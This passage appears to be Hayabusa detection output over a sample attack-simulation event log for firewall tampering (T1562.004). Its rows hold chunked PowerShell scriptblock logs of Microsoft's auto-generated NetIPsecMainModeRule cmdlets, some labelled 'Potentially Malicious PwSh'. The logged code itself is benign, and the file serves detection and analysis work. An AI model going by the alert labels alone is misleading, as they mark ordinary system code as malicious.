[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,info,,PwSh Scriptblock Log,"n_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Get-NetIPsecMainModeRule' -Alias '*' function Set-NetIPsecMainModeRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${Platform}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParam",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1562.004-Impair Defenses-Disable or Modify System Firewall/ID4103-4104-2004-OpenSSH firewall rule activation.evtx 2021-04-23 19:09:44.864 +09:00,srvdefender01.offsec.lan,4104,medium,,Potentially Malicious PwSh,"eter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MainModeCryptoSet')) { [object]$__cmdletization_value = ${MainModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'MainModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSet')) { [object]$__cmdletization_value = ${Phase1AuthSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Phase1AuthSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LocalAddress')) { [object]$__cmdletization_value = ${LocalAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:LocalAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('RemoteAddress')) { [object]$__cmdletization_value = ${RemoteAddress} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:RemoteAddress'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetIPsecMainModeRule' -Alias '*' function Remove-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, 